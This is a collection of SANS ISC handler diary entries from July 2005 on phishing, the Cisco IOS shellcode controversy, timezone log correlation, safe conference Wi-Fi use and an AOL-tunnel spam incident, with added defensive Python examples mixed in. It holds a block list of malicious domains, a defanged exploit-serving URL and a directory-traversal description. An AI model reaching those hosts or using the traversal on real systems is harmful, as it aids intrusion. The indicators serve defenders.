Diaries

Published: 2005-07-31

Another Phishing Trick; More Osama Messages; Crunchy-Gooey Security Designs

It's been a quiet day here in the land of the Net. Here are a few miscellaneous items that arrived in our mailbox recently.

Another Phishing Trick



Charles sent us a note about a phishing scam that used a relatively uncommon technique to conceal the true location of the malicious link. The usual HREF link was enclosed in a FORM whose ACTION pointed to the phishing site. Although some mail clients may get confused by this, the latest version of Outlook Express does show the malicious URL when the mouse hovers over the link.
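As an added illustration (not code from the original diary), here is a small Python check that parses an HTML message body and flags any anchor enclosed in a FORM whose ACTION host differs from the host in the link's own HREF. The message body and the hostnames in it are constructed.

```python
"""Flag e-mail HTML where an <a href> sits inside a <form> whose ACTION points
at a different host than the link itself.

Added example, not code from the diary. The message body below is constructed;
the hosts in it use the reserved .test TLD.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


def host_of(url):
    """Lower-cased hostname of a URL, or '' for relative/empty/odd values."""
    try:
        return (urlparse(url.strip()).hostname or "").lower()
    except ValueError:
        return ""


class FormWrappedLinkAuditor(HTMLParser):
    """Tracks open <form action=...> elements and records every anchor whose
    visible href host differs from the enclosing form's action host."""

    def __init__(self):
        super().__init__()
        self.open_forms = []   # stack of action values (nested/unclosed forms)
        self.findings = []     # (href, form_action) pairs worth a second look

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.open_forms.append(a.get("action") or "")
        elif tag == "a" and self.open_forms:
            href = a.get("href") or ""
            action = self.open_forms[-1]
            if action and host_of(href) != host_of(action):
                self.findings.append((href, action))

    def handle_endtag(self, tag):
        if tag == "form" and self.open_forms:
            self.open_forms.pop()


def audit_html(body):
    """Return the list of suspicious (href, action) pairs found in `body`."""
    p = FormWrappedLinkAuditor()
    p.feed(body)
    p.close()
    return p.findings


# Constructed sample: a legitimate-looking link wrapped in a form that posts
# to an unrelated host, plus an ordinary link outside any form.
SAMPLE_BODY = """<html><body>
<p>Dear customer, please verify your account.</p>
<form action="http://login.example-phish.test/collect.cgi" method="post">
  <a href="https://www.example-bank.test/login">https://www.example-bank.test/login</a>
  <input type="submit" value="Continue">
</form>
<p><a href="https://www.example-bank.test/help">Help</a></p>
</body></html>"""

if __name__ == "__main__":
    for href, action in audit_html(SAMPLE_BODY):
        print(f"link shows host {host_of(href)!r} but form posts to {host_of(action)!r}")
```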

More Osama Messages



Ane wrote to us with concerns over malicious email messages with the subject "Osama bin Laden Captured." The message enticed the victim to visit a site that attempted to install a malicious executable. The use of such headlines to trick people is not new; however, there has been a rise in the occurrence of such messages since June. We are not aware of these messages exploiting any new vulnerabilities, so you should be safe as long as:



1. Your Windows patches are up to date

2. Your anti-virus is up-to-date

3. You do not click on suspicious email attachments or links



Today's points out that they've witnessed the Bobic worm "being seeded in emails claiming that Osama Bin Laden has been captured."

Crunchy-Gooey Security Designs



David told us about a New York Times article titled
. The article talks about security assessment projects conducted by Mark Seiden. The article mentions the familiar metaphor of many security infrastructure designs that "have this hard, crunchy outside, but they're very gooey and soft inside." One of the most difficult aspects of protecting such networks comes up during incident response: during the investigation one finds a plethora of logging information on perimeter devices. In contrast, internal systems often do not capture enough auditing details to allow the incident handler to determine what happened and why.



Lenny Zeltser

ISC Handler of the Day

http://www.zeltser.com

0 Comments

Published: 2005-07-30

Who needs .info/.biz, anyway?; Cisco IPV6 vuln; NIST minimum security requirements

Who needs .info/.biz, anyway?



After spending a couple of hours following up on a malware incident late Friday night, I have come to the conclusion that ICANN could do us all a tremendous favor by pulling the .info and .biz Top Level Domains (TLDs). It strongly looks to me as if 98% of all domains underneath these two TLDs belong to nefarious web sites in one of the countries-where-ISPs-ignore-all-complaints (CWIIAC).



Some companies have started to zap all access to .biz and .info, and to white-list those that the users really need (www.mta.info being near the top of this list if your shop is near NYC). If you are not white-listing yet, here are a couple of URLs which, in my personal opinion, you might want to consider adding to your blocklist:


*.komforochka.info
*.dlyasvobornyx.biz
*.all-answers.info
*.iframeprofit.biz
*.total-search.info
*.our-counter.biz

While you're at it, you might want to check your logs for access going to hXXp://195.225.176.25. This site is a particular "friend" of mine; it has been around since February or so, and is of course located in one of the CWIIAC. Currently, the site is serving up IE exploits from hXXp://195.225.176.25/user.scripts/u217/dir38500256.cgi, but I won't be surprised if this URL has already been shifted by now. The site itself and the exploits it contains will likely stay, though, as long as Ukraine is among the CWIIAC.



Time Zone & DST



As one more proof that sysadmins do not need additional time zone confusion, Johannes Ullrich has checked the submissions to DShield. Most of the submissions that can be verified are right on time - those that aren't, though, are not off by measly minutes, they are off by n*60 minutes, hence entire time zones. See http://isc.sans.org/timeshiftgraph.php for a glimpse of pure timezone joy.

Cisco IPV6 Vulnerability



Cisco have updated their advisory today, see http://www.cisco.com/warp/public/707/cisco-sa-20050729-ipv6.shtml . The advisory stresses that the problem cannot be exploited from more than one hop away, but I'm not quite sure I would bet too much on that one if my routers had IPv6 turned on. Carefully checking the list of vulnerable IOS releases and patching if necessary sounds like a better strategy than waiting until somebody shows that the attack also works across "one hop" for disconcertingly large values of "one".

NIST Minimum Security Requirements Paper



NIST have put a draft paper on minimum security requirements for federal information systems on the web a couple of days ago: http://www.csrc.nist.gov/publications/drafts/FIPS-200-ipd-07-13-2005.pdf
While not everything in the paper is equally useful, I quite like the section titled "Specifications for Minimum Security Requirements", starting on page 2. A brief but encompassing paragraph touches on 17 areas of importance to Information Security, ranging from (AC) Access Control to (SI) System and Information Integrity. If you're drafting an information security budget or program for next year at the moment, glancing through this list might help you to get your priorities straight.
---------------

Daniel Wesemann

EMail: echo "ebojfm/jtdAhnbjm/dpn" | perl -pe 's/(.)/chr(ord($1)-1)/ge'

0 Comments

Published: 2005-07-29

Lynn's Cat is Out of The Bag; Cisco IPv6 Advisory; Log Juggling Courtesy of US Congress


Lynn's Cat is Out of The Bag


While Black Hat may have torn out paper pages, the PDF of Michael Lynn's
presentation, "The Holy Grail: Cisco IOS Shellcode and Exploitation
Techniques," lives on. Given the amount of attention this thing has gotten,
mirrors and links to it are now all over the place.



Responsible disclosure or not, there is no excuse not to upgrade IOS if you
haven't recently. Details on this are provided in today's ........(look at the
next bit)


Cisco IPv6 Advisory


http://www.cisco.com/en/US/products/products_security_advisory09186a00804d82c9.shtml


Cisco has released the above advisory stating that all un-upgraded IPv6
configured routers are vulnerable to DoS and possible shellcode execution. According to Cisco:

"all Cisco devices running any unfixed version of Cisco IOS
code that supports, and is configured for, IPv6. A system which supports IPv6,
if not specifically configured for IPv6, is not affected"



Additionally, an example of Cisco shellcode was recently brought to our
attention that DOES work against the versions stated in the code. It is against
an old integer overflow vuln via the HTTP service. While this code is a couple
of years old, it is still an example of what is possible. Please don't ask me
for a link to it. It's publicly available for those who look & I'm not into
having to defend linking to 3v1L code.



As I said earlier, there is no excuse not to upgrade IOS if you haven't
recently.


Log Juggling Courtesy of US Congress



I have a pet peeve. Oh, ok...a lot of pet peeves. I'll try to stay focused on
one at a time. Timezones...what a silly idea. "We'll hold that conference call
at 1500." AM or PM? What TZ? What month? When do you change to Daylight Saving
Time? When do I? And then the US Congress decides that moving little black
pointers on a white and black disc on my wall will save oil. I've got a better
idea. When the sun is at the zenith over some uninhabited point in the middle
of the Atlantic (all right - the Pacific), we'll call it 0000 hours.
Everywhere. Argue about it all you want, it's like changing to the metric
system. It works and there is no more ambiguity.




*poof* Oh, I was dreaming. We are governed by peoples (yea, peopleS. Lots of
different groups of people, worldwide) who believe that we are too stupid or
intolerant of change to make that work. Now in step the US legislators, who
further think that - well, I don't know what they think. They have decreed,
though, that as of this year, the parts of America that do the DST shuffle will
hold off until November 30th, and then "spring ahead" again a month earlier,
too. See for House of Representatives Bill 6 and all the gory details. I used tinyurl since the real URL is a mess. Why does this matter to a security geek like me?




One of the great annoyances I have to regularly deal with when correlating logs
from various systems is clock sync and the lack thereof. A few months ago I
spent a fair bit of time putting together a bunch of Perl just to align the
timestamps from boatloads of files from various systems, and found that we were
dealing with things like ±18000 seconds from boxes with or without proper TZ
settings. In other cases we had DST (Daylight Saving Time) vs non-DST systems
off by roughly 3600 secs.




Once we got all the boxes in question mapped to their offsets, it was a simple
matter of running the collected data through the scripts using our uber-l33t
host/logtype/offset matrix (down, Ed!). We had built enough fudge factor in to
cope with clock drift, so we didn't need to redo the offset numbers more than once.




Jump ahead to November 1, 2005. What the h4ck! Some systems will need a shift
by 3600 seconds again! The machines that didn't get the "I'm sure it's coming.
Just wait" Microsoft/Novell/*n*x patch will stand out as the only ones that
didn't hold off. They will all be at GMT-0500, when everything else will still
be basking in the sunshine of -0400.
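To make the host/logtype/offset matrix idea concrete, here is an added Python example (not the author's Perl). It normalizes each source's local timestamps to UTC through a matrix of per-source offsets, tolerates a few minutes of clock drift as the "fudge factor", and flags sources whose measured offset is off by a whole number of hours, which is exactly how the box that did not get the DST patch would stand out. The hosts, log format and offsets are constructed for the example.

```python
"""Normalize log timestamps from hosts with mixed time zone / DST settings.

Added example, not the diary author's Perl. Input lines are constructed in a
collector format where each line carries the collector's UTC receive time and
the host's own local timestamp:
    <recv-utc> <host> <logtype> <local-ts> <message>
"""
from datetime import datetime, timedelta, timezone

FMT = "%Y-%m-%dT%H:%M:%S"
HOUR = 3600
DRIFT_TOLERANCE = 300   # seconds of ordinary clock drift tolerated (the "fudge factor")

# host/logtype -> seconds to ADD to that source's local timestamp to reach UTC.
# Hypothetical hosts, constructed for this example; this is the "offset matrix".
OFFSET_MATRIX = {
    ("fw1", "pix"): 0,                 # logs in UTC already
    ("mail1", "sendmail"): 4 * HOUR,   # US Eastern on daylight time (-0400)
    ("dc1", "eventlog"): 4 * HOUR,     # expected to be on -0400 as well
}


def parse_collector_line(line):
    recv, host, logtype, local, msg = line.split(" ", 4)
    return {
        "recv": datetime.strptime(recv, FMT).replace(tzinfo=timezone.utc),
        "host": host,
        "logtype": logtype,
        "local": datetime.strptime(local, FMT),   # naive: whatever the box thinks
        "msg": msg,
    }


def to_utc(rec, matrix=OFFSET_MATRIX):
    """Apply the matrix offset and return an aware UTC datetime."""
    off = matrix[(rec["host"], rec["logtype"])]
    return (rec["local"] + timedelta(seconds=off)).replace(tzinfo=timezone.utc)


def measured_offset(rec):
    """Offset (seconds) implied by comparing the collector's receive time with
    the host's local timestamp; includes a little network/queue delay."""
    local_as_utc = rec["local"].replace(tzinfo=timezone.utc)
    return int((rec["recv"] - local_as_utc).total_seconds())


def classify(rec, matrix=OFFSET_MATRIX):
    """'ok', 'drift', or 'tz_shift:+Nh' when the host is off by whole hours
    relative to the matrix (the DST-patch-not-applied signature)."""
    expected = matrix[(rec["host"], rec["logtype"])]
    delta = measured_offset(rec) - expected
    if abs(delta) <= DRIFT_TOLERANCE:
        return "ok"
    hours = round(delta / HOUR)
    if hours != 0 and abs(delta - hours * HOUR) <= DRIFT_TOLERANCE:
        return f"tz_shift:{hours:+d}h"
    return "drift"


def audit(lines, matrix=OFFSET_MATRIX):
    """Return {(host, logtype): classification} over all lines."""
    return {(r["host"], r["logtype"]): classify(r, matrix)
            for r in map(parse_collector_line, lines)}


# Constructed sample: dc1 is the box that fell back to -0500 while the others
# stayed on -0400, so its local clock reads one hour earlier than it should.
SAMPLE_LINES = [
    "2005-11-01T14:00:07 fw1 pix 2005-11-01T14:00:05 Deny tcp src outside:192.0.2.10/3001 dst inside:198.51.100.5/1433",
    "2005-11-01T14:00:10 mail1 sendmail 2005-11-01T10:00:00 relay=[192.0.2.20] reject=550",
    "2005-11-01T14:00:12 dc1 eventlog 2005-11-01T09:00:02 EventID=529 Logon Failure user=administrator",
]

if __name__ == "__main__":
    for source, verdict in audit(SAMPLE_LINES).items():
        print(source, verdict)
```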




Cool! This may very well be the first US Government legislated aid to patch management! Just watch the timestamps of outgoing email & sic the local admins on 'em. Maybe they should legislate a new time shift every second Tuesday of the month. :-p



Cheers!



g
Published: 2005-07-28

More Cisco/Blackhat

Cisco/Blackhat



We did receive quite a bit of input about Michael Lynn's presentation about the
Cisco flaws. Beyond what was reported in the press, we have nothing new/different
to add. It looks like things will move to the courts.

The quick summary: Michael Lynn talked about how to better exploit known
flaws in Cisco IOS. He did not talk about any new / 0 day vulnerability. However,
with his work it could be easier to write exploit code that will change router
settings or run arbitrary code. Most of these techniques have been discussed before, but the presentation put a lot of them in an easier to understand context.

What does it mean for companies running Cisco equipment: Patch. It is possible that some flaws, which were considered 'DOS only' flaws at this point, can be
used to execute code on the router. Cisco routers may attract more attention
as a result of the presentation (not like they got left out of the games so far).

So again: Nothing fundamentally new, but a new quality of exploitation. At this point, it's more of a legal issue than a technical issue.

Some links that go into more detail about the affair:

http://blogs.washingtonpost.com/securityfix/

http://www.securityfocus.com/news/11259
Feel free to voice your opinion in our , but keep it civil (the forum is moderated, and now email addresses are obfuscated).

Windows Genuine Advantage update


Update to Windows Genuine Advantage.
One reader pointed out that despite Microsoft's assertion to the contrary, this "patch" could be backed out. I won't be providing the details.

Donald Smith
Published: 2005-07-27

Pirates and Patches; Blackhat censorship?; IPsec vulnerabilities adding up; Ethereal vulnerabilities; Who's SAPing you

Microsoft no longer providing patches to pirates




If you visit windowsupdate today you will probably be invited to install.

Windows Genuine Advantage Validation Tool (KB892130)
From the Microsoft website:

"The Windows Genuine Advantage Validation Tool enables you to
verify that your copy of Microsoft Windows is genuine. The tool validates
your Windows installation by checking Windows Product Identification and
Product Activation status. After you install this item, you may have to restart your computer.
Once you have installed this item, it cannot be removed."

"Concerned about privacy? When you check for updates, basic information about your computer,
not you, is used to determine which updates your programs need.
To learn more, see our privacy statement."



This last statement is intended to address privacy issues. While a "nice" statement, many of us
would like to know EXACTLY what is collected and transmitted to Microsoft by this licence tool.
In my opinion Microsoft is well within their rights to require licence proof before providing patches.

Ethereal vulnerabilities



Upgrade to 0.10.12. Right now! Or at least before you need to use ethereal again.
Due to the severity and scope of the defects
that have been discovered, no workaround is available.


Who's SAPing you


A vulnerability was announced for SAP R/3:

The vulnerability is caused due to an input validation error in the
Internet Graphics Server (IGS) subcomponent when processing document paths.
This can be exploited to access arbitrary files on the system outside the
web root by supplying a document path containing a directory traversal sequence (../).
The vulnerability has been reported in SAP prior to version 6.40 Patch 11.

BlackHat censoring?




This comes from a blog so take it for what it is worth.


The first "scandal" to emerge from Black Hat 2005 (so far, at least)
is the omission of some 30 pages of text from the 1,000-page-plus conference
presentation materials, which were handed out to conference attendees when
they registered on Tuesday. The missing pages -- literally ripped from the
massive handout -- apparently detailed the specifics of a serious security flaw
present in Cisco Systems routers, devices
that route the majority of Internet traffic on the Web today.


The only "official" comment on the missing pages on the Cisco flaw
was a photographed copy of a notice distributed with each bundle of
conference materials. The notice states:
"Due to some last minute changes beyond Black Hat's control, and
at the request of the presenter, Michael Lynn,
the included materials aren't up to the standards Black Hat tries to meet.
Black Hat will be the first to apologize. We hope the vendors involved will follow suit."


Who is Mike Lynn?
Mr. Lynn is a well known vulnerability researcher for Internet Security Systems.
He is credited with finding several vulnerabilities in Cisco products.

He is quoted here on router worm potential.




Our own Joshua Wright states
Note that Mike Lynn was going to present on exploiting IOS to use vulnerabilities in code
to run arbitrary code of the attacker's choosing. This is a huge deal, since a problem
with IOS that was formerly limited to a DoS could be leveraged to add configuration
commands to the IOS configuration, or other nasty things.



UPDATE!


Mike resigned from ISS and gave his talk.

"Cisco respects and encourages the work of independent research scientists;
however, we follow an industry established disclosure process for communicating
to our customers and partners," the company said in a statement released Wednesday.
"It is especially regretful, and indefensible, that the Black Hat Conference organizers
have given Mr. Lynn a platform to publicly disseminate the information he illegally obtained."

Further Update


Based on what I have read, this is basically adding a whole new dimension to the router exploit field:
remote code execution via buffer overflow. That in general has not existed in the Cisco world because no one had developed it. In the past most router vulnerabilities were denial of service vulnerabilities.
See

for additional details on this event.

AH MAC vulnerability in FreeBSD





II. Problem Description
A programming error in the implementation of the AES-XCBC-MAC algorithm
for authentication resulted in a constant key being used instead of the
key specified by the system administrator.

III. Impact
If the AES-XCBC-MAC algorithm is used for authentication in the absence
of any encryption, then an attacker may be able to forge packets which
appear to originate from a different system and thereby succeed in
establishing an IPsec session. If access to sensitive information or
systems is controlled based on the identity of the source system, this
may result in information disclosure or privilege escalation.

Patches available here:


Combined with the ESP IPsec vulnerability NISCC announced, this negates
their recommended mitigation (add AH to ESP).

Published: 2005-07-26

ClamAV vulnerability; Con-fu

Clam AntiVirus vulnerability



A vulnerability was discovered in the popular open-source anti-virus
scanner Clam AntiVirus. Many people are running this on their mail
servers, so make sure that your e-mail administrators update to the
latest version. Vulnerability details here:


http://www.osvdb.org/displayvuln.php?osvdb_id=18259


Con-fu



Many of you might be attending the security conference Black Hat and/or
Defcon this week. I decided that it might be good to put up some tips
for computer security when attaching to the wireless networks there. Of
course, you can use these tips for any other untrusted network. Feel
free to send us your tips also.



I have a couple of Linux machines running at my house. So I have found
that the safest way to hit the Internet is to tunnel everything through
SSHD at my home network.



My first suggestion: if you absolutely don't need to connect, then don't
take the risk. Just keep your laptop in your hotel room for emergencies
and you won't have to deal with the inevitable frustration of the
wireless network going down. Yes, you may have some envy as you see
everyone else geeking out in the hallways. But you will have the added
advantage of being unencumbered as you head to the bar/pool/casino
tables later.



Second major point: if you have a Windows laptop that is work-related,
you may want to seriously consider not attaching it to the networks
there. Consider all of the different software on your machine that will
be trying to connect to IP addresses inside your organization:
anti-virus updates, NetBIOS shares, etc. You would be surprised how
persistent the software loaded on your Windows laptop is nowadays and
all of this traffic is information leakage over a hostile network. At
the office or at home, this information leakage probably isn't a big
concern, but when you are attaching to a very well monitored network you
should think twice about it.



THINGS TO EXPECT:



*) The wireless network will go down... often. Despite the best efforts
of the organizers, it is very difficult to keep the wireless network
up and working.


*) There are all sorts of games that are played upon the wireless
network. Fake access points go up and down. Rogue DHCP servers
answer to requests. The routers get hammered with DoS attacks.


*) Expect weird DHCP and DNS stuff to happen.


*) Finally, try to recall all of the attacks you have seen in the last
year and dismissed because the attacker needed to be local to your
network. Then realize that you are about to connect to that network.

BEFORE YOU LEAVE:



*) Regardless of OS, make sure your laptop is patched. If running
Linux, make sure your kernel is current/patched.


*) Double check your firewall settings from another machine.


*) Set up SSHD on the proxy machine on a port other than 22. I would
keep it below 1024 so that only a root-owned process can be listening
there.


*) Hard-code your proxy box IP address into your hosts file on your
laptop. This prevents DNS hijacking at the conference.


*) Verify that your SSHD allows public key authentication only. If you
didn't already have it setup, generate a public/private keypair on
your laptop. Also, make a note of your server's public key on your
laptop to reduce any question of man-in-the-middle attacks
later.


*) Verify that your SSHD only allows SSH protocol version 2.


*) Set up a Squid proxy server on that box. This will allow you to proxy
HTTP and FTP traffic.


*) Configure another machine to log all attempted connections to the
destination box running your SSHD. This is just for you to review
later when you get home and see if anybody was watching you connect
to your daemon.


AT THE CONFERENCE:



*) When you get to the conference, try to hard-code the MAC address of
the default router. Use the arp command to do this. The MAC
addresses of the routers are usually published at Black Hat.


*) After booting your laptop, SSH to your proxy box and set up port
forwarding: ssh -L3128:localhost:3128 <username>@<proxy_ip>


*) After the SSH tunnel is up, make sure that your web browser is using
the proxy address of 127.0.0.1:3128. This will force all of the web
browser traffic to traverse the SSH tunnel and get handled by the
Squid proxy server. For command-line applications on UNIX, you can
sometimes set the http_proxy and ftp_proxy environment variables to
the proxy address.


*) With all of this in place, I would still be very hesitant about
connecting to corporate e-mail systems (especially Outlook Web
Access). Do you really want to put your organization at risk by
connecting to these systems and having someone shoulder-surf your
email?


*) Do you believe strongly in your VPN client? That's great. But why
put your organization at risk by showing everyone else the IP address
of your VPN gateway?


*) If you are running Windows, consider the following additional
measures to prevent information leakage from NetBIOS broadcast
traffic...


*) Turn off Client for Microsoft Networks.


*) Turn off File and Printer Sharing.


*) Turn off NetBIOS over TCP/IP.


*) Consider changing the domain name and machine name of your computer.



[end]

0 Comments

Published: 2005-07-25

Top20 List Updated; TCP/1433 Remains Elevated; ZoneAlarm 6.0 Released; The Penetrating Packets: Spam E-Mail

Top20 List Updated



The SANS Top 20 Internet Security Vulnerabilities list was updated today with information for the 2nd quarter of 2005. See the current information
.




TCP/1433 Remains Elevated



We continue to see an increase in probes on TCP port 1433. If you have any interesting packet captures, please submit them
.




ZoneAlarm 6.0 Released



The entire ZoneLabs ZoneAlarm product family has been updated. Version 6.0 of each of the products was released a couple of days ago. For more information, go
.




The Penetrating Packets: Spam E-Mail



Background: What Happened?



Last week, I was awoken early in the morning by a ringing cell phone. A co-worker was calling to say that they hadn't received any email in about 6 hours, which for them was unusual. I got up, went downstairs, got online, connected to our relay email server, checked the queue and was immediately wide-awake when I saw that there were 150,000 plus messages sitting in our email queue waiting to be processed. That's outside the normal scope of our queue size by just a tad ;-)

So I started digging through the messages in the queue looking to see if I could figure out the problem. I knew our email server was not an open email relay (or at least it hadn't been yesterday). I saw that most of the email had "From:" and "To:" headers involving domains in China and Taiwan. None of the obvious spam email was to or from any of our domains or addresses.

Ok, so why was the email being accepted by our server? I noticed that the values in the "From:" and "To:" fields were using the Big5 character set and started wondering if perhaps this was a new trick of spammers to get around SMTP header filters on email servers. So I shut down the email server and started working to clean out the queued spam email.

Several hours later, I had the queue reasonably cleaned up and restarted the email server to start processing email ... and saw the queue immediately start to accumulate lots of fresh spam. All right, what's going on here?!?!

Research: Where's It Coming From?



So I started looking through the logs further and realized that all this spam email wasn't coming from the Internet ... it was coming from our internal email server used by employees to send/receive email. Checking the logs on that email server, I saw LOTS of SMTP connections from our SSH gateway. In order to access the end-point email server from outside the office, employees needed to connect through an SSH tunnel. The computers on our local network are considered to be trusted by our relay email server and so it will accept any email from these computers no matter what the destination address is.

Ok, so this implied that the spam was coming through an employee's computer. Killing off the established SSH connections of the dozen or so folks currently connected terminated the ongoing flood of new spam messages entering our system. Now to try to figure out where the problem computer was. We contacted each of the employees who had been connected at the time and one by one started ruling them out as the source. Almost everyone had a broadband Internet connection and was behind a hardware firewall which blocked connection attempts from the Internet from reaching their computer. The few folks without hardware firewalls had personal software firewalls on their computers and we verified that the firewall was working correctly. One down, another eliminated, and so on until, hey wait a minute, we just eliminated the last employee who was online this morning!!! So if everyone had a hardware or software firewall that was correctly blocking connection requests from the Internet, how did someone connect to them? (Hint: It's a 3-letter word).

Back to the logs to try to find an IP address that would hopefully match up with one of the IP addresses an employee had earlier in the morning. Most of the SPAM messages had forged HELO values that were completely bogus, but some had IP addresses and after lots and lots of searching, I got a match with someone who was connected throughout the night when the spam flood was ongoing.

Solution:



So I contacted the suspected employee again and we went through the firewall settings. The problem turned out to have two parts.

Part 1 - Contributing Factor: When you set up SSH tunnels on your local machine to connect to a remote server, you usually associate the listening port with your local loopback adapter. Thus, only processes on your computer can connect to the tunnel endpoint and be connected to whatever is on the far end. You can configure many SSH clients to bind the listening port to *ALL* interfaces on your computer (which will include any Ethernet or Wireless interfaces). In such cases, a remote user could then initiate a connection request to the tunnel port on your computer (if not blocked by a firewall) and go through the tunnel to whatever is on the remote end.

As it turned out, this employee's SSH client was configured to bind tunnel end-points to all interfaces instead of to just the loopback adapter, thus creating the potential for a problem. But still, the hardware and software firewalls should have prevented such connections. What happened?
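The "which interfaces does my tunnel listen on" question comes up both here and in the Con-fu checklist's ssh -L3128:localhost:3128 command. As an added example (not the diary's or OpenSSH's own code), the Python below applies OpenSSH's documented bind rules for -L / LocalForward: an explicit localhost bind is loopback-only, an empty or '*' bind address is all interfaces, and no bind address at all defers to the GatewayPorts setting. The ssh_config text it audits is constructed.

```python
"""Work out which interfaces an OpenSSH local port forward will listen on.

Added example, not code from the diary or from OpenSSH. Implements the
documented -L / LocalForward bind rules: bind_address 'localhost' means
loopback only, an empty address or '*' means all interfaces, and a forward
with no bind_address follows the GatewayPorts setting. Bracketed IPv6
bind addresses are not handled.
"""
from dataclasses import dataclass
from typing import Optional

LOOPBACK = {"localhost", "127.0.0.1", "::1"}
ANY = {"", "*", "0.0.0.0", "::"}


@dataclass
class Forward:
    bind_address: Optional[str]   # None = not given at all
    port: int
    host: str
    hostport: int


def parse_forward(spec):
    """Parse '[bind_address:]port:host:hostport' as given to ssh -L."""
    parts = spec.split(":")
    if len(parts) == 3:
        bind, port, host, hostport = None, *parts
    elif len(parts) == 4:
        bind, port, host, hostport = parts
    else:
        raise ValueError(f"unsupported forward spec: {spec!r}")
    return Forward(bind, int(port), host, int(hostport))


def exposure(fwd, gateway_ports=False):
    """'loopback', 'all-interfaces', or 'interface:<addr>' for a forward."""
    if fwd.bind_address is None:
        return "all-interfaces" if gateway_ports else "loopback"
    if fwd.bind_address in LOOPBACK:
        return "loopback"
    if fwd.bind_address in ANY:
        return "all-interfaces"
    return f"interface:{fwd.bind_address}"   # pinned to one local address


def audit_ssh_config(text):
    """Walk a client ssh_config and return [(listen_port, exposure), ...].

    Only GatewayPorts and LocalForward are interpreted; a GatewayPorts
    line applies to the LocalForward lines after it in the same Host block.
    """
    findings = []
    gateway = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        key = key.lower()
        if key == "host":
            gateway = False            # new block starts from the default
        elif key == "gatewayports":
            gateway = value.strip().lower() == "yes"
        elif key == "localforward":
            # ssh_config form: LocalForward [bind_address:]port host:hostport
            listen, _, target = value.strip().partition(" ")
            fwd = parse_forward(f"{listen}:{target}")
            findings.append((fwd.port, exposure(fwd, gateway)))
    return findings


# Constructed ssh_config: the first block exposes its Squid forward to every
# interface via GatewayPorts, the second keeps the default loopback binding.
SAMPLE_CONFIG = """
Host proxy
    GatewayPorts yes
    LocalForward 3128 localhost:3128
Host other
    LocalForward 8080 localhost:80   # loopback by default
"""

if __name__ == "__main__":
    for port, where in audit_ssh_config(SAMPLE_CONFIG):
        print(f"local port {port} listens on: {where}")
```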

Part 2 - The Culprit: In the first "Die Hard" movie, Hans Gruber says "You asked for a miracle. I give you the F.B.I." Today, I say "You asked for a culprit. I give you the A.O.L."

If you have an existing Internet connection and then run the AOL software to have access to AOL content, you are in fact setting up a VPN across the Internet between your computer and the AOL servers. If you run "ipconfig", you will see that you now have an additional virtual Ethernet adapter that has an IP address that is from AOL. When you access any AOL content, the packet comes from your computer's virtual AOL IP address and is encapsulated in a packet that comes from your computer's real IP address. The responses from AOL come back in an encapsulated packet as well.

So how does this help someone bypass your firewall? Your computer has two IP addresses while you are connected to AOL. IP address 1 is the real one and IP address 2 is the virtual one from AOL. An attacker who tries to connect to your real IP address from the Internet will be blocked by either your hardware or software firewall (if you haven't configured a hole for that type of traffic). But what happens if they scan AOL's network and happen to try to connect to the IP address that AOL has currently assigned to you? AOL will accept the traffic, determine who currently has that IP address and then encapsulate that packet inside of a new one that is addressed not to your virtual AOL IP address but to your real IP address. Because you established the connection to AOL, your firewall has tagged this as an established connection and so any data coming back is considered to be part of an approved, established connection as well and is allowed to pass through your firewall.

Moral:



Make sure you know what software you have installed on your computer and how it is configured. Defense-in-depth doesn't help if you have provided an access path that bypasses all of your defenses.
Published: 2005-07-24

How you can help; Strange Spam Update; port 3001 update

"How can I help?"



Here at the ISC, we occasionally get a note from a reader wanting to know how
they can do something to help out around the place. While we typically point
them in the direction of DShield < http://www.dshield.org/howto.php > and
remind them that the ISC thrives on reader submitted activity and reports,
there is a new thing that you, the reader, can do to help out, if you're so inclined.
The BleedingSnort folks have a new "Spyware Listening Post" project they're
working on, and they have put out a call for volunteers.
< http://www.bleedingsnort.com/article.php?story=20050724144916974 >
Granted, this isn't ISC related, but it's a neat little project, and definitely provides
a good starting point for all those readers who want to write the next "Follow The
Bouncing Malware" series but don't quite know where to start, or those who just
want to get a better handle on what's going on in the netherworld of spammers,
botnets, con-artists, and marketers.

"Strange Spam" update



It appears that the weird "1.txt" spams people are getting are being sent from
systems compromised with one of the Bagle trojans; or so we hear from several
of our readers.

Source port 3001 update


Reader Jason L. writes in about a tool he's been tracking for a while now that
spoofs scans from unused IP addresses with source port 3001 and TCP ID 26127.
Anyone have an idea what tool this is? If so, we'd love to hear about it over
in our shiny new discussion forum! < http://forum.dshield.org/list.php?3 >

0 Comments

Published: 2005-07-23

Strange Spam; Update on Port 3001; New Discussion Forum; Small Website Change; Cisco Humor; SANS Washington DC

Strange Spam

We have not figured out the source or reason of the strange spam reported in the Handler's Diary. It's clear that at the MTA level the spam is coming from many different sources, which is typical of spam generated by compromised computers. But who/what is behind it and what it means is still a mystery.

Update on Port 3001

Our report yesterday that tcp/3001 was rising needs a bit of clarification. It's the SOURCE port that is rising, not the DESTINATION port.



David dropped us a note that said, "It seems that there is a tool or malware that uses a default source port of 3001. I noticed this on a dest port 1666 scan and started looking around and noticed the source port 3001 similarity. Below are some common scans where all scans performed were *only* from source port 3001. I searched through my firewall logs going back to December and then got a list of IP addresses using source port 3001 then filtered out those that weren't using port 3001 exclusively. Below is a list of ports and the count of instances.


count  dest port
   29  1433
   18  42
   84  6101

Looks like there is something out there scanning for SQL, WINS and Veritas possibly using a specific scanning tool."
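As an added example (not David's or the diary's code), here is a Python version of the method he describes, run over constructed iptables-style firewall log lines: collect the source IPs seen with source port 3001, drop any that also used other source ports, then count the destination ports the remaining ones probed.

```python
"""Find scanners that use a fixed source port (the source-port-3001 pattern).

Added example, not from the diary. Reproduces the reader's method: gather
source IPs seen with source port 3001, discard those that also used other
source ports, then count destination ports for what remains. Log lines are
constructed in an iptables/netfilter-like format.
"""
import re
from collections import Counter, defaultdict

FIXED_SPORT = 3001

LINE_RE = re.compile(
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=TCP SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)"
)


def parse(line):
    """Return (src_ip, sport, dport) for a TCP log line, or None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return m["src"], int(m["spt"]), int(m["dpt"])


def fixed_source_port_scanners(lines, sport=FIXED_SPORT):
    """{src_ip: Counter(dst_port)} for sources that used ONLY `sport`."""
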